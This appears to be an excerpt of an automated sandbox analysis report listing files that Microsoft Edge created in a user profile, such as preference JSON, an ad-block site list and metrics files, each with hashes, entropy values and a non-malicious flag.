                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612264"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\52f2d48b-7c53-418c-a31f-b984d7b64341.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45559
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089760469047486
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:pMkbJrT8IeQc5d9yN09hDO6vP6O8PTNBPU2D75q5EJNQhv5ZYCAoFGoup1Xl3jVQ:pMk1rT8H19y36aNRNQh3YRoFhu3VlXrI
                                                                                                                                                                                                                                                                  MD5:039303FF3AB123A149919C3A03BB2020
                                                                                                                                                                                                                                                                  SHA1:9BE0C63A4F1B101ED4885B9BA8BB569591BD0EE7
                                                                                                                                                                                                                                                                  SHA-256:C5F485D37A2BE79BB417A3D37B4205556015ADD38F186958F06E349C36DF4D64
                                                                                                                                                                                                                                                                  SHA-512:9CEA361680A8A25DDB7EA69CD8A7B557597550BBD0CBACA3DE4C67EFD84359983E36173BC6111CB7D68D90391DE337BCA8607A926C66DFC2ADEFE8348F029A31
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612264"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6567cad7-5279-4cba-939e-ca655bdda5b4.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):44604
                                                                                                                                                                                                                                                                  Entropy (8bit):6.096928925895078
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBmwuAhDO6vP6O8PTNBLH2+NI2cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEO6aNPchu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:498AC44D4D73CC09375E9009B43B0ECA
                                                                                                                                                                                                                                                                  SHA1:B12F46BF29C2469D55EDACF1BD75D8B74F400BEF
                                                                                                                                                                                                                                                                  SHA-256:4E2B2E9F9AC290DE91A33A0BB44A278530B249D47F4520A0999D54CF7BC4A703
                                                                                                                                                                                                                                                                  SHA-512:7D63B74B1808FC8D4F79989349FCAB0E39710DFD798274B0321D6055C41AE78861A346F78F3286CF518E01BDC7BD7A9E80E7B0E3EF7F8CFB695AE580072027E0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\69168584-bc80-494e-991f-c695a860b7f4.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44604
                                                                                                                                                                                                                                                                  Entropy (8bit):6.096928925895078
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBmwuAhDO6vP6O8PTNBLH2+NI2cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEO6aNPchu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:498AC44D4D73CC09375E9009B43B0ECA
                                                                                                                                                                                                                                                                  SHA1:B12F46BF29C2469D55EDACF1BD75D8B74F400BEF
                                                                                                                                                                                                                                                                  SHA-256:4E2B2E9F9AC290DE91A33A0BB44A278530B249D47F4520A0999D54CF7BC4A703
                                                                                                                                                                                                                                                                  SHA-512:7D63B74B1808FC8D4F79989349FCAB0E39710DFD798274B0321D6055C41AE78861A346F78F3286CF518E01BDC7BD7A9E80E7B0E3EF7F8CFB695AE580072027E0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\87adb04a-9566-446a-a6f9-91619f05102b.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45559
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089779616269063
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:pMkbJrT8IeQc5d9yNzguhDO6vP6O8PTNBPU2D75q5EJNQhv5ZYCAoFGoup1Xl3jm:pMk1rT8H19y86aNRNQh3YRoFhu3VlXrI
                                                                                                                                                                                                                                                                  MD5:862B8B57A2E4D992B24EDBC58DFCF60B
                                                                                                                                                                                                                                                                  SHA1:33B0FA93BDCAB6019911CAFC442C53E3F1A85181
                                                                                                                                                                                                                                                                  SHA-256:A1B874EF4EE46C0D38DAC8E5046031CE07F8AB27C0F77ED8109CE9B2E74A3870
                                                                                                                                                                                                                                                                  SHA-512:6401CA6FED8E1CB9F27FCEDE6D044F5A49A630A98EE877E0F33DDA6E725A9B2D019C04F8300243AF32AF77B9EA584899619AE60D0956C07A23AFFD466DD79B5B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612264"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\2006dbb2-7425-44ad-a1df-c0e3d985fb73.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                  Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                  MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                  SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                  SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                  SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                  Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                  MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                  SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                  SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                  SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67641522-1C5C.pma

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.5143453962396329
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:YH8vM27kdjAjdQTwm0/Ug1HFq289JmoPLr5MxHO8KOuRZms1ldg1HFb:bvMj0JQTr0/UaHl8P5CY8KOuOsJaH1
                                                                                                                                                                                                                                                                  MD5:39C7AE641CAD92E2695F0EBDF4F6B2D5
                                                                                                                                                                                                                                                                  SHA1:BE6D4C3543D7D3A94CBB2EDDE01FCC94EC441A38
                                                                                                                                                                                                                                                                  SHA-256:D5732A740334701A3270CD19BAF87A0C41E59E6CF3B8EF78BEA8CD1564D24B95
                                                                                                                                                                                                                                                                  SHA-512:F0A1149E9DFD66BC49D4013E5BE953940C7AA20582EE8CFD77C872350EEEA1C54DDD0C80761355928E1E3FD97BECACBF4B1A8F1C59B6E86B46E8540601F424A7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................>..p=..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ktfrkr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K.u.$r.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2........9..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67641531-19D4.pma

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0445247564503364
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:vmz30o3tmZUIatdHJg+0UggrXwveI8Pkt1kKh1PNCipDw1gQswcfeHn8y08Tcm2D:vU30st6WDdUS4hJtEgEcf808T2RGOD
                                                                                                                                                                                                                                                                  MD5:B6344D1137F264836B6B4D08A3B52A4C
                                                                                                                                                                                                                                                                  SHA1:715397B814A52FA91FC65ED5C019F6386561BCC8
                                                                                                                                                                                                                                                                  SHA-256:123676570594DF3647B767E6B24370D7592E7874A53FCE1D0C3C4AA1E8A55D8C
                                                                                                                                                                                                                                                                  SHA-512:94B891A399E06618A5BF3660BA87CF09FC174EEABEECF4D16906E2FD61BFA53FC2D9D02DF5959315D65D87A3CD34DC0A582E11958360BA1773E3F6CE9FC699B8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................e...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ktfrkr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..Uu.$r.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._...... .2...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                  Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                  MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                  SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                  SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                  SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\00d2bca5-5397-4f9e-b2be-8740fd48b53d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9260
                                                                                                                                                                                                                                                                  Entropy (8bit):5.101493297958984
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmrSNs9FsZihnkn3h88bV+FiA66WwaFIMY8P5YJ:stmrys9FfhqbGix6WwaTYb
                                                                                                                                                                                                                                                                  MD5:B418AC2E3C710B55088DAFD5BF820B37
                                                                                                                                                                                                                                                                  SHA1:987E0F35695B401F7B15F1E87F28184729435DF8
                                                                                                                                                                                                                                                                  SHA-256:7BCCFDD0A47B1DA09206123E2A8CBE61A749D591D4B066B31FFC016087C59C40
                                                                                                                                                                                                                                                                  SHA-512:9D06D2BB95020DA0AAF8F39AA08F356980D110978B7AA74D1F14F1CFF74640E91895593E8243C4E2C4318E6A91C404CEB492755785674176CD48C04A66F0039F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13379085859689246","domain_dive

